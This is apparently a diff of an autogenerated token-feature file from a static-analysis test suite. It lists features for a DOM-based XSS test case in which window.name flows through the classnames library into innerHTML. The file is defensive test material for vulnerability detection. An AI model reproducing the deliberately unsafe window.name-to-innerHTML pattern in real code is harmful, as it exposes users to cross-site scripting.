unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:18:1 | return of function main | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:6:1:18:1 | return of function main | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:6:10:6:13 | main | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:6:10:6:13 | main | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:6:10:6:13 | main | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:12 | document | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:12 | document | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:12 | document | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:12 | document | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:17 | document.body | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:17 | document.body | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:17 | document.body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:17 | document.body | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:27 | documen ... nerHTML | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:27 | documen ... nerHTML | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:27 | documen ... nerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:27 | documen ... nerHTML | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:84 | documen ... ` | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:84 | documen ... ` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:84 | documen ... ` | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:84 | documen ... ` | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:7:5:7:84 | documen ... ` | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:7:14:7:17 | body | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:7:14:7:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:7:14:7:17 | body | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:7:14:7:17 | body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:7:14:7:17 | body | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:7:19:7:27 | innerHTML | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:7:19:7:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:7:19:7:27 | innerHTML | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:7:19:7:27 | innerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:7:19:7:27 | innerHTML | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:7:31:7:84 | `` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/classnames.js:7:31:7:84 | `` | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:7:31:7:84 | `` | contextSurroundingFunctionParameters | () | @@ -12095,12 +92161,27 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/classnames.js:7:32:7:44 | Hello' | +| autogenerated/Xss/DomBasedXss/classnames.js:7:47:7:56 | classNames | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:7:47:7:56 | classNames | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:7:47:7:56 | classNames | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:7:47:7:56 | classNames | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:7:47:7:56 | classNames | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:7:47:7:69 | classNa ... w.name) | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:7:47:7:69 | classNa ... w.name) | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/classnames.js:7:47:7:69 | classNa ... w.name) | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:7:47:7:69 | classNa ... w.name) | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:7:47:7:69 | classNa ... w.name) | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:7:47:7:69 | classNa ... w.name) | stringConcatenatedWith | 'Hello' | +| autogenerated/Xss/DomBasedXss/classnames.js:7:47:7:69 | exceptional return of classNa ... w.name) | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:7:47:7:69 | exceptional return of classNa ... w.name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:7:47:7:69 | exceptional return of classNa ... w.name) | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:7:47:7:69 | exceptional return of classNa ... w.name) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:7:47:7:69 | exceptional return of classNa ... w.name) | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:7:58:7:63 | window | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:7:58:7:63 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:7:58:7:63 | window | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:7:58:7:63 | window | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:7:58:7:63 | window | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:7:58:7:68 | window.name | CalleeFlexibleAccessPath | classNames | | autogenerated/Xss/DomBasedXss/classnames.js:7:58:7:68 | window.name | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/classnames.js:7:58:7:68 | window.name | calleeImports | classnames | @@ -12109,12 +92190,47 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/classnames.js:7:58:7:68 | window.name | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:7:58:7:68 | window.name | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:7:58:7:68 | window.name | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:7:65:7:68 | name | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:7:65:7:68 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:7:65:7:68 | name | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:7:65:7:68 | name | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:7:65:7:68 | name | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:7:71:7:83 | ">Hello | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:7:71:7:83 | ">Hello | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/classnames.js:7:71:7:83 | ">Hello | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:7:71:7:83 | ">Hello | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:7:71:7:83 | ">Hello | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:7:71:7:83 | ">Hello | stringConcatenatedWith | 'Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:8:5:8:12 | document | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:8:5:8:12 | document | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:8:5:8:17 | document.body | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:8:5:8:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:8:5:8:17 | document.body | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:8:5:8:17 | document.body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:8:5:8:17 | document.body | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:8:5:8:27 | documen ... nerHTML | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:8:5:8:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:8:5:8:27 | documen ... nerHTML | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:8:5:8:27 | documen ... nerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:8:5:8:27 | documen ... nerHTML | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:8:5:8:85 | documen ... ` | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:8:5:8:85 | documen ... ` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:8:5:8:85 | documen ... ` | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:8:5:8:85 | documen ... ` | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:8:5:8:85 | documen ... ` | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:8:14:8:17 | body | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:8:14:8:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:8:14:8:17 | body | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:8:14:8:17 | body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:8:14:8:17 | body | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:8:19:8:27 | innerHTML | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:8:19:8:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:8:19:8:27 | innerHTML | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:8:19:8:27 | innerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:8:19:8:27 | innerHTML | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:8:31:8:85 | `` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/classnames.js:8:31:8:85 | `` | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:8:31:8:85 | `` | contextSurroundingFunctionParameters | () | @@ -12127,12 +92243,27 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/classnames.js:8:32:8:44 | Hello' | +| autogenerated/Xss/DomBasedXss/classnames.js:8:47:8:57 | classNamesD | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:8:47:8:57 | classNamesD | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:8:47:8:57 | classNamesD | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:8:47:8:57 | classNamesD | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:8:47:8:57 | classNamesD | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:8:47:8:70 | classNa ... w.name) | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:8:47:8:70 | classNa ... w.name) | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/classnames.js:8:47:8:70 | classNa ... w.name) | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:8:47:8:70 | classNa ... w.name) | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:8:47:8:70 | classNa ... w.name) | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:8:47:8:70 | classNa ... w.name) | stringConcatenatedWith | 'Hello' | +| autogenerated/Xss/DomBasedXss/classnames.js:8:47:8:70 | exceptional return of classNa ... w.name) | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:8:47:8:70 | exceptional return of classNa ... w.name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:8:47:8:70 | exceptional return of classNa ... w.name) | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:8:47:8:70 | exceptional return of classNa ... w.name) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:8:47:8:70 | exceptional return of classNa ... w.name) | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:8:59:8:64 | window | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:8:59:8:64 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:8:59:8:64 | window | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:8:59:8:64 | window | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:8:59:8:64 | window | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:8:59:8:69 | window.name | CalleeFlexibleAccessPath | classNamesD | | autogenerated/Xss/DomBasedXss/classnames.js:8:59:8:69 | window.name | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/classnames.js:8:59:8:69 | window.name | calleeImports | classnames/dedupe | @@ -12141,12 +92272,47 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/classnames.js:8:59:8:69 | window.name | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:8:59:8:69 | window.name | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:8:59:8:69 | window.name | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:8:66:8:69 | name | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:8:66:8:69 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:8:66:8:69 | name | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:8:66:8:69 | name | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:8:66:8:69 | name | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:8:72:8:84 | ">Hello | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:8:72:8:84 | ">Hello | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/classnames.js:8:72:8:84 | ">Hello | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:8:72:8:84 | ">Hello | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:8:72:8:84 | ">Hello | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:8:72:8:84 | ">Hello | stringConcatenatedWith | 'Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:9:5:9:12 | document | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:9:5:9:12 | document | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:9:5:9:17 | document.body | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:9:5:9:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:9:5:9:17 | document.body | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:9:5:9:17 | document.body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:9:5:9:17 | document.body | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:9:5:9:27 | documen ... nerHTML | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:9:5:9:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:9:5:9:27 | documen ... nerHTML | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:9:5:9:27 | documen ... nerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:9:5:9:27 | documen ... nerHTML | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:9:5:9:85 | documen ... ` | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:9:5:9:85 | documen ... ` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:9:5:9:85 | documen ... ` | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:9:5:9:85 | documen ... ` | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:9:5:9:85 | documen ... ` | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:9:14:9:17 | body | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:9:14:9:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:9:14:9:17 | body | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:9:14:9:17 | body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:9:14:9:17 | body | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:9:19:9:27 | innerHTML | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:9:19:9:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:9:19:9:27 | innerHTML | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:9:19:9:27 | innerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:9:19:9:27 | innerHTML | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:9:31:9:85 | `` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/classnames.js:9:31:9:85 | `` | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:9:31:9:85 | `` | contextSurroundingFunctionParameters | () | @@ -12159,12 +92325,27 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/classnames.js:9:32:9:44 | Hello' | +| autogenerated/Xss/DomBasedXss/classnames.js:9:47:9:57 | classNamesB | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:9:47:9:57 | classNamesB | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:9:47:9:57 | classNamesB | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:9:47:9:57 | classNamesB | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:9:47:9:57 | classNamesB | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:9:47:9:70 | classNa ... w.name) | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:9:47:9:70 | classNa ... w.name) | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/classnames.js:9:47:9:70 | classNa ... w.name) | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:9:47:9:70 | classNa ... w.name) | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:9:47:9:70 | classNa ... w.name) | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:9:47:9:70 | classNa ... w.name) | stringConcatenatedWith | 'Hello' | +| autogenerated/Xss/DomBasedXss/classnames.js:9:47:9:70 | exceptional return of classNa ... w.name) | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:9:47:9:70 | exceptional return of classNa ... w.name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:9:47:9:70 | exceptional return of classNa ... w.name) | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:9:47:9:70 | exceptional return of classNa ... w.name) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:9:47:9:70 | exceptional return of classNa ... w.name) | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:9:59:9:64 | window | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:9:59:9:64 | window | contextSurroundingFunctionParameters | 